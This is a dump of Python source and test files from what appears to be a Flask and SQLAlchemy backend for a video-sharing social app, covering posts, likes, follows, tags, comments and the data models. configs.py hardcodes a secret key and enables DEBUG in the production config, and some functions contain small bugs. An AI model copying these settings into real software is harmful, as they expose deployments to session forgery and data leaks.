dict(ret_list)\n\n@register('get_user_following')\ndef get_user_following(user_id,limit=50,offset=0):\n assert_error(type(user_id) == types.IntType,'ParamError')\n follows = User.query.join(UserFollowAsso,User.id == UserFollowAsso.user_id_to).\\\n filter(UserFollowAsso.user_id == user_id).limit(limit).offset(offset).all()\n return [u.json for u in follows]\n\n@register('get_user_following_count')\ndef get_user_following_count(user_id):\n _count = UserFollowAsso.query.filter(UserFollowAsso.user_id == user_id).count()\n return _count\n\n@register('get_user_follower')\ndef get_user_follower(user_id,limit=50,offset=0):\n assert_error(type(user_id) == types.IntType,'ParamError')\n follows = User.query.join(UserFollowAsso,User.id == UserFollowAsso.user_id).\\\n filter(UserFollowAsso.user_id_to == user_id).limit(limit).offset(offset).all()\n return [u.json for u in follows]\n\n@register('get_user_follower_count')\ndef get_user_follower_count(user_id):\n _count = UserFollowAsso.query.filter(UserFollowAsso.user_id_to == user_id).count()\n return _count\n\n\n\n\n\n" }, { "alpha_fraction": 0.5649828314781189, "alphanum_fraction": 0.5919568538665771, "avg_line_length": 29.417909622192383, "blob_id": "300d419e0fabe507946dfad635ddb266b67b2833", "content_id": "3c9b61b175177e87aa57cbd23ca971e4b12888b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2039, "license_type": "no_license", "max_line_length": 81, "num_lines": 67, "path": "/tests/test_comment.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestComment(TestCase):\n\n\n def test_comment_view(self):\n\n # post\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n headers = self.generate_header('weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n\n data = {\n 'author_id':user1['id'],\n 'content':'comment01',\n 'post_id':post1['id']\n }\n\n resp = self.client.post('/comment',data=json.dumps(data),headers=headers,\n content_type='application/json')\n\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['content'] == 'comment01'\n \n # delete\n resp = self.client.delete('/comment/%d'%_data['id'],\n headers=headers,content_type='application/json')\n print resp.data\n assert resp.status_code == 204\n\n def test_post_comment_view(self):\n\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n comment1 = backend.add_comment(post1['id'],'comment1',user1['id'])\n comment2 = backend.add_comment(post1['id'],'comment2',user1['id'])\n comment3 = backend.add_comment(post1['id'],'comment3',user1['id'])\n\n headers = self.generate_header('weibo_id01')\n\n resp = self.client.get('/post/%d/comment' % post1['id'],headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['comments']) == 3\n\n" }, { "alpha_fraction": 0.627364456653595, "alphanum_fraction": 0.6368222236633301, "avg_line_length": 24.901639938354492, "blob_id": "6a66a454c757ca9390ea870ec606d73d852a7d73", "content_id": "658d593958e224a04953b7eba3bb6ee2928fc8f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1586, "license_type": "no_license", "max_line_length": 75, "num_lines": 61, "path": "/motiky/views/tag.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n# date: 2013-04-16\n\nimport sys \nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.configs import rq\n\ninstance = Blueprint('tag',__name__)\n\nclass TagView(MethodView):\n\n def get(self,tag_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 10\n offset = (page - 1) * 50\n\n tag = backend.get_tag(tag_id)\n posts = backend.get_tag_post(tag_id,limit=limit,offset=offset)\n count = backend.get_tag_post_count(tag_id)\n\n for post in posts:\n try:\n user = backend.get_user(post['author_id'])\n post['user'] = user\n except BackendError,ex:\n continue\n\n return jsonify(tag=tag,posts=posts,count=count,page=page)\n\nclass TagsView(MethodView):\n\n def get(self):\n tags = backend.get_recommend_tags()\n return jsonify(results=tags)\n\ninstance.add_url_rule('/tag/<int:tag_id>',view_func=TagView.as_view('tag'),\n methods=['GET',])\ninstance.add_url_rule('/tags',view_func=TagsView.as_view('tags'),\n methods=['GET',])\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5953288674354553, "alphanum_fraction": 0.5994598269462585, "avg_line_length": 27.475112915039062, "blob_id": "21ac3ae4e1e4cffb0285b0dd7ea2c9c3cc154df3", "content_id": "758c33ff29a5a843b1077ee51c266ea47e39b9e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6310, "license_type": "no_license", "max_line_length": 92, "num_lines": 221, "path": "/motiky/logic/logic_post.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-01-30\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,UserPlayAsso\n\nfrom motiky.configs import db\n\n\n@register('get_post')\ndef get_post(post_id):\n post = Post.query.get(post_id)\n return post.json\n\n@register('add_post')\ndef add_post(title,author_id,video_url,pic_small='',pic_big='',show=True,recommended=False):\n assert_error(type(title) == types.StringType,'ParamError')\n assert_error(type(author_id) == types.IntType,'ParamError')\n assert_error(type(video_url) == types.StringType,'ParamError')\n\n qd = {\n 'title':title,\n 'author_id':author_id,\n 'video_url':video_url,\n 'pic_small':pic_small,\n 'pic_big':pic_big,\n 'show':show,\n 'recommended':recommended,\n }\n try:\n p = Post(**qd)\n db.session.add(p)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n return p.json\n\n\n\n@register('set_post')\ndef set_post(post_id,pdict):\n fd_list = ('title','pic_small','pic_big','author_id','show',\n 'recommended','date_create','date_update','date_publish')\n cset = set(pdict.keys())\n if not cset.issubset(fd_list):\n raise BackendError('ParamError','更新的字段不允许')\n post = Post.query.get(post_id)\n for k,v in pdict.items():\n if v is not None:\n setattr(post,k,v)\n try:\n db.session.commit()\n except:\n db.session.rollback()\n raise \n\n return post.json\n\n\n@register('get_latest_post')\ndef get_latest_post(offset=0,limit=50):\n posts = Post.query.filter(Post.show == True).order_by(Post.date_create.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n\n@register('get_post_count')\ndef get_post_count():\n count = Post.query.filter(Post.show == True).count()\n return count\n\n@register('get_hot_post')\ndef get_hot_post(offset=0,limit=50):\n posts = Post.query.filter(Post.show == True).order_by(Post.visite_count.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n@register('get_user_post')\ndef get_user_post(user_id,offset=0,limit=20):\n assert_error(offset >= 0,'ParamError')\n posts = Post.query.filter(Post.author_id == user_id).\\\n order_by(Post.date_create.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n@register('get_user_post_count')\ndef get_user_post_count(user_id):\n count = Post.query.filter(Post.author_id == user_id).count()\n return count\n\n\n@register('get_user_liked_post')\ndef get_user_liked_post(user_id,offset=0,limit=20):\n assert_error(offset >= 0,'ParamError')\n posts = Post.query.join(UserLikeAsso,Post.id == UserLikeAsso.post_id).\\\n filter(UserLikeAsso.user_id == user_id).\\\n order_by(UserLikeAsso.date_create.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n@register('get_user_liked_post_count')\ndef get_user_liked_post_count(user_id):\n count = Post.query.join(UserLikeAsso,Post.id == UserLikeAsso.post_id).\\\n filter(UserLikeAsso.user_id == user_id).count()\n return count\n\n@register('get_post_liked_count')\ndef get_post_liked_count(post_id):\n count = UserLikeAsso.query.filter(UserLikeAsso.post_id == post_id).count()\n return count\n\n@register('add_like')\ndef add_like(user_id,post_id):\n ula = UserLikeAsso()\n ula.user_id = user_id\n ula.post_id = post_id\n try:\n db.session.add(ula)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return ula.id\n\n@register('del_like')\ndef del_like(user_id,post_id):\n assert_error(all([type(x) == types.IntType for x in [user_id,post_id]]),\n 'ParamError')\n ula = UserLikeAsso.query.filter(UserLikeAsso.user_id == user_id).\\\n filter(UserLikeAsso.post_id == post_id).first()\n if ula is None:\n return\n try:\n db.session.delete(ula)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return True\n\n\n@register('add_play')\ndef add_play(user_id,post_id):\n assert_error(all([type(x) for x in [user_id,post_id]]),'ParamError')\n ura = UserPlayAsso()\n ura.user_id = user_id\n ura.post_id = post_id\n\n try:\n db.session.add(ura)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n\n@register('add_play_count')\ndef add_play_count(post_id,count=1):\n post = Post.query.get(post_id)\n post.play_count += count\n try:\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return post.json\n\n@register('is_like_post')\ndef is_like_post(uid,post_id):\n if type(post_id) == types.IntType:\n _count = db.session.query(UserLikeAsso.id).\\\n filter(db.and_(UserLikeAsso.user_id == uid,\n UserLikeAsso.post_id == post_id)).count()\n return True if _count > 0 else False\n elif type(post_id) == types.ListType:\n liked_post_ids = db.session.query(UserLikeAsso.post_id).\\\n filter(db.and_(UserLikeAsso.user_id == uid,\n UserLikeAsso.post_id.in_(post_id))).all()\n liked_post_ids = [p[0] for p in liked_post_ids]\n ret_list = [(ret,ret in liked_post_ids) for ret in post_id]\n return dict(ret_list)\n\n" }, { "alpha_fraction": 0.6081504821777344, "alphanum_fraction": 0.6394984126091003, "avg_line_length": 18.8125, "blob_id": "0db275e96da3ac8c54639ff4dbeed880093ff5c0", "content_id": "f976ff54840815adf8b95b417163236878d9e532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 86, "num_lines": 16, "path": "/worker.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport rq\nfrom rq import Queue,Connection,Worker\n\n\n# why this? it can use the sqlalchemy's connection poll from rq Performance notes \n# add by notedit 2013-01-24\n\nwith Connection():\n\n qs = map(rq.Queue, sys.argv[1:]) or [rq.Queue()]\n \n w = rq.Worker(qs)\n w.work()\n\n\n" }, { "alpha_fraction": 0.7176923155784607, "alphanum_fraction": 0.7238461375236511, "avg_line_length": 27.866666793823242, "blob_id": "9d86467a4dbb8d214aacba1fc541bfd58ee2d92c", "content_id": "badb46345ec26df994d81477fb0f0f3078fc84f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1300, "license_type": "no_license", "max_line_length": 84, "num_lines": 45, "path": "/motiky/configs.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport socket\nimport datetime\n\nfrom redis import Redis\nfrom rq import Connection,Queue\nfrom flask.ext.redis import Redis as fRedis\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.cache import Cache\nfrom flask.ext.mail import Mail\n\ndb = SQLAlchemy()\ncache = Cache()\nmail = Mail()\nredis = fRedis()\nrq = Queue('motiky',connection=Redis())\n\nclass DefaultConfig(object):\n\n DEBUG = False\n SECRET_KEY = 'lifeistooshorttowait'\n APPLICATION_SECRET = 'lifeistooshorttowait'\n SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://user:password@localhost/motiky'\n SQLALCHEMY_ECHO = False\n\nclass TestConfig(object):\n CONFIG_TYPE = 'test'\n SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://user:password@localhost/test'\n SQLALCHEMY_ECHO = False\n APPLICATION_SECRET = 'lifeistooshorttowait'\n CSRF_ENABLED = False\n VIDEO_URL_PREFIX = 'http://localhost'\n\nclass DevConfig(object):\n CONFIG_TYPE = 'dev'\n SQLALCHEMY_DATABASE_URI = \\\n 'postgresql+psycopg2://user:password@localhost/motiky'\n\nclass ProductionConfig(object):\n CONFIG_TYPE = 'production'\n SQLALCHEMY_ECHO = False\n VIDEO_URL_PREFIX = 'http://motiky01.b0.upaiyun.com'\n SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://user:password@localhost/motiky'\n DEBUG = True\n\n" }, { "alpha_fraction": 0.7770270109176636, "alphanum_fraction": 0.7804054021835327, "avg_line_length": 16.294116973876953, "blob_id": "63c63aa951b470390c442ad49eb0109f86d471e1", "content_id": "868a9ff3fb6b7a2cb3c251e8d3aa72f2db4d633a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 52, "num_lines": 17, "path": "/motiky/logic/__init__.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport logic_user\nimport logic_post\nimport logic_action\nimport logic_activity\nimport logic_feed\nimport logic_tag\nimport logic_comment\nimport logic_other\n\n# import some other logic here\n\n\nfrom motiky import coreutil\n\nbackend = coreutil.Backend(coreutil.backend_mapping)\n\n\n" }, { "alpha_fraction": 0.6236559152603149, "alphanum_fraction": 0.6344085931777954, "avg_line_length": 14.166666984558105, "blob_id": "2104f689436bfe87e117ff3e92e3ae5b96655a5c", "content_id": "27b8bfd15598f313d4fc0962ab6954faf730d01b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/motiky/helpers.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n\nimport functools\n\nfrom flask import g\n\n\n" }, { "alpha_fraction": 0.5972937941551208, "alphanum_fraction": 0.6198453903198242, "avg_line_length": 29.372549057006836, "blob_id": "a14d75e316111a7b69563931b908f42c3adddc44", "content_id": "255f88554a507aac43e5f7d7b44d44af614292a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 87, "num_lines": 51, "path": "/tests/test_tag.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action,Tag,Tagging\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestTag(TestCase):\n\n\n def test_tag_view(self):\n tag1 = Tag(name='tag1',show=True,pic_url='pic_url',\n recommended=True)\n tag2 = Tag(name='tag2',show=True,pic_url='pic_url',\n recommended=True)\n db.session.add(tag1)\n db.session.add(tag2)\n db.session.commit()\n\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n tagging1 = Tagging(taggable_type='post',taggable_id=post1['id'],tag_id=tag1.id)\n tagging2 = Tagging(taggable_type='post',taggable_id=post2['id'],tag_id=tag1.id)\n\n headers = self.generate_header('weibo_id01')\n # get\n resp = self.client.get('/tag/%d'% tag1.id,headers=headers)\n data_get = json.loads(resp.data)\n assert data_get['tag']['name'] == 'tag1'\n\n # get tags \n resp = self.client.get('/tags',headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['results']) == 2\n\n\n\n" }, { "alpha_fraction": 0.6004018187522888, "alphanum_fraction": 0.6092841029167175, "avg_line_length": 33.630035400390625, "blob_id": "d987aa5a5cb04fe4048ffbe31d9f8a39f3fc8b11", "content_id": "8a92fc1229e9c9403bd73e928e1d6f4408e1d7b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9457, "license_type": "no_license", "max_line_length": 82, "num_lines": 273, "path": "/motiky/logic/models.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\n# add your models here\nimport os\nimport uuid\nimport contextlib\nfrom datetime import datetime\n\nfrom flask import current_app\nfrom werkzeug import cached_property\nfrom sqlalchemy.dialects.postgresql import ARRAY,UUID\n\nfrom motiky.configs import db,DefaultConfig\n\nDATE_FMT = '%Y-%m-%d %H:%M:%S'\nDATE_DEFAULT = '2013-05-30 12:00:00'\n\ndef format_date(date):\n return date.strftime(DATE_FMT) if date else DATE_DEFAULT\n\nclass User(db.Model):\n\n __tablename__ = 'user_info' \n id = db.Column(db.Integer,primary_key=True)\n username = db.Column(db.String(50))\n email = db.Column(db.String(50),unique=True)\n photo_url = db.Column(db.String(100))\n signature = db.Column(db.String(255))\n status = db.Column(db.String(20))\n uid = db.Column(db.String(100),index=True,unique=True)\n push_on = db.Column(db.Boolean,default=True)\n access_token = db.Column(db.String(128))\n date_create = db.Column(db.DateTime,default=datetime.now)\n date_update = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n username=self.username,\n email=self.email,\n photo_url=self.photo_url,\n signature=self.signature,\n status=self.status,\n uid=str(self.uid),\n push_on=self.push_on,\n access_token=self.access_token,\n date_create=format_date(self.date_create),\n date_update=format_date(self.date_update))\n\n\nclass Post(db.Model):\n\n __tablename__ = 'post'\n id = db.Column(db.Integer,primary_key=True)\n title = db.Column(db.String(300))\n pic_small = db.Column(db.String(255))\n pic_big = db.Column(db.String(255))\n video_url = db.Column(db.String(255))\n author_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n show = db.Column(db.Boolean,default=True,index=True)\n recommended = db.Column(db.Boolean,default=False,index=True)\n play_count = db.Column(db.Integer,default=0)\n date_create = db.Column(db.DateTime,default=datetime.now)\n date_update = db.Column(db.DateTime,default=datetime.now)\n date_publish = db.Column(db.DateTime,default=datetime.now)\n user = db.relation(User, innerjoin=True, lazy=\"joined\")\n\n @cached_property\n def json(self):\n video_prefix = current_app.config.get('VIDEO_URL_PREFIX') if current_app \\\n else DefaultConfig.VIDEO_URL_PREFIX\n return dict(id=self.id,\n title=self.title,\n pic_big=self.pic_big,\n pic_small=os.path.join(video_prefix,self.pic_small or ''),\n video_url=os.path.join(video_prefix,self.video_url or ''),\n author_id=self.author_id,\n show=self.show,\n recommended=self.recommended,\n play_count=self.play_count,\n date_create=format_date(self.date_create),\n date_update=format_date(self.date_update),\n date_publish=format_date(self.date_publish))\n\n\nclass Report(db.Model):\n\n __tablename__ = 'report'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n post_id = db.Column(db.Integer,db.ForeignKey(Post.id),index=True)\n user = db.relation(User,innerjoin=True,lazy='joined')\n post = db.relation(Post,innerjoin=True,lazy='joined')\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n\nclass Install(db.Model):\n\n __tablename__ = 'install'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True,unique=True)\n version = db.Column(db.String(20))\n badge = db.Column(db.Integer,default=0)\n device_token = db.Column(db.String(100),index=True)\n device_type = db.Column(db.String(20))\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @property\n def json(self):\n return dict(id=self.id,\n user_id=self.user_id,\n version=self.version,\n badge=self.badge,\n device_token=self.device_token,\n device_type=self.device_type,\n date_create=format_date(self.date_create))\n\n\nclass UserFollowAsso(db.Model):\n\n __tablename__ = 'user_follow_asso'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n user_id_to = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n __table_args__ = (\n db.UniqueConstraint('user_id','user_id_to'),\n )\n\n\nclass UserLikeAsso(db.Model):\n \n __tablename__ = 'user_like_asso'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n post_id = db.Column(db.Integer,db.ForeignKey(Post.id),index=True)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n __table_args__ = (\n db.UniqueConstraint('user_id','post_id'),\n )\n\nclass UserPlayAsso(db.Model):\n\n __tablename__ = 'user_play_asso'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer)\n post_id = db.Column(db.Integer)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n\nclass Comment(db.Model):\n\n __tablename__ = 'comment'\n id = db.Column(db.Integer,primary_key=True)\n post_id = db.Column(db.Integer,index=True)\n author_id = db.Column(db.Integer,db.ForeignKey(User.id))\n content = db.Column(db.String(1000))\n show = db.Column(db.Boolean,default=True)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n post_id=self.post_id,\n author_id=self.author_id,\n content=self.content,\n show=self.show,\n date_create=format_date(self.date_create))\n\n\nclass Activity(db.Model):\n\n __tablename__ = 'activity'\n id = db.Column(db.Integer,primary_key=True)\n post_id = db.Column(db.Integer)\n comment_id = db.Column(db.Integer)\n from_id = db.Column(db.Integer)\n to_id = db.Column(db.Integer)\n atype = db.Column(db.String(20))\n # atype follow like comment post_reco text \n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n post_id=self.post_id,\n comment_id=self.comment_id,\n from_id=self.from_id,\n to_id=self.to_id,\n atype=self.atype,\n date_create=format_date(self.date_create))\n\n\nclass Action(db.Model):\n\n __tablename__ = 'action'\n id = db.Column(db.Integer,primary_key=True)\n post_id = db.Column(db.Integer)\n user_id = db.Column(db.Integer,index=True)\n atype = db.Column(db.String(20),index=True)\n payload = db.Column(db.String(255))\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n post_id=self.post_id,\n user_id=self.user_id,\n atype=self.atype,\n payload=self.payload,\n date_create=format_date(self.date_create))\n\n\nclass Tag(db.Model):\n\n __tablename__ = 'tag'\n id = db.Column(db.Integer,primary_key=True)\n name = db.Column(db.String(255),index=True)\n show = db.Column(db.Boolean,default=True)\n pic_url = db.Column(db.String(255))\n order_seq = db.Column(db.Integer,default=0)\n recommended = db.Column(db.Boolean,default=False)\n date_create = db.Column(db.DateTime,default=datetime.now)\n \n @cached_property\n def json(self):\n return dict(id=self.id,\n name=self.name,\n show=self.show,\n pic_url=self.pic_url,\n order_seq=self.order_seq,\n recommended=self.recommended,\n date_create=format_date(self.date_create))\n\n\nclass Tagging(db.Model):\n\n __tablename__ = 'tagging'\n id = db.Column(db.Integer,primary_key=True)\n taggable_type = db.Column(db.String(20))\n taggable_id = db.Column(db.Integer)\n tag_id = db.Column(db.Integer)\n user_id = db.Column(db.Integer)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n taggable_type=self.taggable_type,\n taggalbe_id=self.taggable_id,\n tag_id=self.tag_id,\n user_id=self.user_id,\n date_create=format_date(self.date_create))\n\n\nclass Storage(db.Model):\n __tablename__ = 'storage'\n id = db.Column(UUID(),default=lambda:str(uuid.uuid4()),primary_key=True)\n file_md5 = db.Column(db.String(80))\n file_size = db.Column(db.Integer)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n\nclass CmsUser(db.Model):\n __tablename__ = 'cms_user'\n id = db.Column(db.Integer,primary_key=True)\n username = db.Column(db.String(50))\n email = db.Column(db.String(50))\n password = db.Column(db.String(80))\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n\n\n" }, { "alpha_fraction": 0.48322147130966187, "alphanum_fraction": 0.5402684807777405, "avg_line_length": 22.84000015258789, "blob_id": "e0da33bb9642d0ac451f41ec560dc02edbfb9d5b", "content_id": "f4aff616b7f2ab9bfcfad4ce6843a8ab5b4ceb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 596, "license_type": "no_license", "max_line_length": 88, "num_lines": 25, "path": "/ctlapp.sh", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#! /usr/bin/env bash\n\n# Author: liulianxiang <[email protected]>\n\n\nMAINMODULE=manage:app\n\ncase $1 in\n start)\n exec gunicorn -D -w 4 -k gevent -p /tmp/motiky.pid -b 127.0.0.1:9090 $MAINMODULE\n ;;\n stop)\n kill -INT `cat /tmp/motiky.pid`\n ;;\n restart)\n kill -INT `cat /tmp/motiky.pid`\n exec gunicorn -D -w 4 -k gevent -p /tmp/motiky.pid -b 127.0.0.1:9090 $MAINMODULE\n ;;\n debug)\n exec gunicorn -w 4 -p /tmp/motiky.pid -b 127.0.0.1:9090 $MAINMODULE\n ;;\n *)\n echo \"./ctlapp.sh start | stop | debug | debug\"\n ;;\nesac\n" }, { "alpha_fraction": 0.5481978058815002, "alphanum_fraction": 0.5892707705497742, "avg_line_length": 24.869565963745117, "blob_id": "b8e37b412fed8edd5ae4b9bb8fd2db03092468e6", "content_id": "01f77c2b367a8825549b51fc917d565c41bfee83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1207, "license_type": "no_license", "max_line_length": 94, "num_lines": 46, "path": "/motiky/strutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sys\nimport time\nimport datetime\nfrom email.utils import formatdate\n\ndef extract_tags(s):\n tags = re.findall(r'''#(\\w+)?#''',s)\n return set(tags) if tags else []\n\ndef read_data(_file):\n file_data = ''\n data = _file.read(8192)\n while data:\n file_data += data\n data = _file.read(8192)\n return file_data\n\ndef cookie_date(epoch_seconds=None):\n rfcdate = formatdate(epoch_seconds)\n return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])\n\ndef int2path(uint,baseurl,extname):\n \"\"\"将32bit正整数转换为path\"\"\"\n file_key = ''\n for i in range(6):\n uint,remainder = divmod(uint,36)\n if remainder < 10:\n file_key = chr(remainder+48) + file_key\n else:\n file_key = chr(remainder+97-10) + file_key\n fullurl = os.path.join(baseurl,file_key[0:2],file_key[2:4],file_key[4:6],file_key+extname)\n return fullurl\n\ndef int2ukey(uint):\n ukey = ''\n for i in range(6):\n uint,remainder = divmod(uint,36)\n if remainder < 10:\n ukey = chr(remainder+48) + ukey\n else:\n ukey = chr(remainder+97-10) + ukey\n return ukey\n\n\n\n" }, { "alpha_fraction": 0.6337719559669495, "alphanum_fraction": 0.640350878238678, "avg_line_length": 27.046154022216797, "blob_id": "607432e94a05538b489f9e4dfdc818a2e034d15c", "content_id": "073b75da79b53e772ecea4964c4c4d78c43f9572", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1824, "license_type": "no_license", "max_line_length": 70, "num_lines": 65, "path": "/motiky/logic/logic_other.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-02-01\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Install,Storage\n\nfrom motiky.configs import db\n\n\n@register('get_install_by_user')\ndef get_install_by_user(user_id):\n _in = Install.query.filter(Install.user_id == user_id).first()\n if _in is None:\n raise BackendError('EmptyError','install do not exit')\n return _in.json\n\n@register('new_install')\ndef new_insall(user_id,device_token,version='',device_type=''):\n assert_error(type(user_id) == types.IntType,'ParamError')\n assert_error(type(device_token) == types.StringType,'ParamError')\n \n install = Install(user_id=user_id,\n device_token=device_token,\n version=version,\n device_type=device_type)\n\n try:\n db.session.add(install)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n return install.json\n\n@register('set_install')\ndef set_install(user_id,idict):\n install = Install.query.filter(Install.user_id == user_id).first()\n if install is None:\n raise BackendError('EmptyError','install does not exist')\n for k,v in idict.items():\n if v:\n setattr(install,k,v)\n try:\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return install.json\n\n@register('add_file_data')\ndef add_file_data(file_size,file_md5):\n st = Storage(file_size=file_size,file_md5=file_md5)\n try:\n db.session.add(st)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n return st.id\n\n" }, { "alpha_fraction": 0.6742061972618103, "alphanum_fraction": 0.6776859760284424, "avg_line_length": 23.978260040283203, "blob_id": "fb282654745a7e94459162f77ae1bab2775839d0", "content_id": "50eb5b66074eae82f0c0c8a457b8d21d7073235b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 